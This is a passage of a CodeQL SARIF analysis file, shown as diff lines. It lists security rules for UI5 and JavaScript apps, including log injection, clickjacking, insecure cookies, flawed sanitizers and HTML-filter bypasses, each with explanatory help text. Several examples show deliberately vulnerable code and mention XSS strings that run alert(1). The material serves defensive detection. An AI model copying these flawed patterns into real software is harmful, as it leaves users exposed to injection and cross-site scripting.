oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", - "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/ui5-log-injection", - "kind" : "path-problem", - "name" : "UI5 Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-clickjacking", - "name" : "js/ui5-clickjacking", - "shortDescription" : { - "text" : "UI5 Clickjacking" - }, - "fullDescription" : { - "text" : "The absence of frame options allows for clickjacking." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", - "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-451" ], - "description" : "The absence of frame options allows for clickjacking.", - "id" : "js/ui5-clickjacking", - "kind" : "problem", - "name" : "UI5 Clickjacking", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "generated/extension-pack", - "semanticVersion" : "0.0.0", - "locations" : [ { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ], - "properties" : { - "isCodeQLModelPack" : true - } - }, { - "name" : "codeql/javascript-queries", - "semanticVersion" : "0.8.10+2daf50500ca8f7eb914c82e88dec36652bfbe8fd", - "notifications" : [ { - "id" : "js/diagnostics/extraction-errors", - "name" : "js/diagnostics/extraction-errors", - "shortDescription" : { - "text" : "Extraction errors" - }, - "fullDescription" : { - "text" : "List all extraction errors for files in the source code directory." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "description" : "List all extraction errors for files in the source code directory.", - "id" : "js/diagnostics/extraction-errors", - "kind" : "diagnostic", - "name" : "Extraction errors" - } - }, { - "id" : "js/diagnostics/successfully-extracted-files", - "name" : "js/diagnostics/successfully-extracted-files", - "shortDescription" : { - "text" : "Extracted files" - }, - "fullDescription" : { - "text" : "Lists all files in the source code directory that were extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "successfully-extracted-files" ], - "description" : "Lists all files in the source code directory that were extracted.", - "id" : "js/diagnostics/successfully-extracted-files", - "kind" : "diagnostic", - "name" : "Extracted files" - } - } ], - "rules" : [ { - "id" : "js/unsafe-external-link", - "name" : "js/unsafe-external-link", - "shortDescription" : { - "text" : "Potentially unsafe external link" - }, - "fullDescription" : { - "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", - "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" - }, - "properties" : { - "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], - "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", - "id" : "js/unsafe-external-link", - "kind" : "problem", - "name" : "Potentially unsafe external link", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/clear-text-cookie", - "name" : "js/clear-text-cookie", - "shortDescription" : { - "text" : "Clear text transmission of sensitive cookie" - }, - "fullDescription" : { - "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", - "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], - "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", - "id" : "js/clear-text-cookie", - "kind" : "problem", - "name" : "Clear text transmission of sensitive cookie", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/incomplete-sanitization", - "name" : "js/incomplete-sanitization", - "shortDescription" : { - "text" : "Incomplete string escaping or encoding" - }, - "fullDescription" : { - "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], - "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", - "id" : "js/incomplete-sanitization", - "kind" : "problem", - "name" : "Incomplete string escaping or encoding", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-html-expansion", - "name" : "js/unsafe-html-expansion", - "shortDescription" : { - "text" : "Unsafe expansion of self-closing HTML tag" - }, - "fullDescription" : { - "text" : "Using regular expressions to expand self-closing HTML tags may lead to cross-site scripting vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `
` to `
` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n
\n\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n
\n\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe expansion of self-closing HTML tag\nSanitizing untrusted input for HTML meta-characters is a common technique for preventing cross-site scripting attacks. But even a sanitized input can be dangerous to use if it is modified further before a browser treats it as HTML. A seemingly innocent transformation that expands a self-closing HTML tag from `
` to `
` may in fact cause cross-site scripting vulnerabilities.\n\n\n## Recommendation\nUse a well-tested sanitization library if at all possible, and avoid modifying sanitized values further before treating them as HTML.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using HTML templates that are explicit about the values they treat as HTML.\n\n\n## Example\nThe following function transforms a self-closing HTML tag to a pair of open/close tags. It does so for all non-`img` and non-`area` tags, by using a regular expression with two capture groups. The first capture group corresponds to the name of the tag, and the second capture group to the content of the tag.\n\n\n```javascript\nfunction expandSelfClosingTags(html) {\n\tvar rxhtmlTag = /<(?!img|area)(([a-z][^\\w\\/>]*)[^>]*)\\/>/gi;\n\treturn html.replace(rxhtmlTag, \"<$1>\"); // BAD\n}\n\n```\nWhile it is generally known regular expressions are ill-suited for parsing HTML, variants of this particular transformation pattern have long been considered safe.\n\nHowever, the function is not safe. As an example, consider the following string:\n\n\n```html\n
\n\"/>\n\n```\nWhen the above function transforms the string, it becomes a string that results in an alert when a browser treats it as HTML.\n\n\n```html\n
\n\"/>\n\n```\n\n## References\n* jQuery: [Security fixes in jQuery 3.5.0](https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using regular expressions to expand self-closing HTML\n tags may lead to cross-site scripting vulnerabilities.", - "id" : "js/unsafe-html-expansion", - "kind" : "problem", - "name" : "Unsafe expansion of self-closing HTML tag", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/bad-tag-filter", - "name" : "js/bad-tag-filter", - "shortDescription" : { - "text" : "Bad HTML filtering regexp" - }, - "fullDescription" : { - "text" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", - "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], - "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", - "id" : "js/bad-tag-filter", - "kind" : "problem", - "name" : "Bad HTML filtering regexp", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/double-escaping", - "name" : "js/double-escaping", - "shortDescription" : { - "text" : "Double escaping or unescaping" - }, - "fullDescription" : { - "text" : "When escaping special characters using a meta-character like backslash or ampersand, the meta-character has to be escaped first to avoid double-escaping, and conversely it has to be unescaped last to avoid double-unescaping." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - 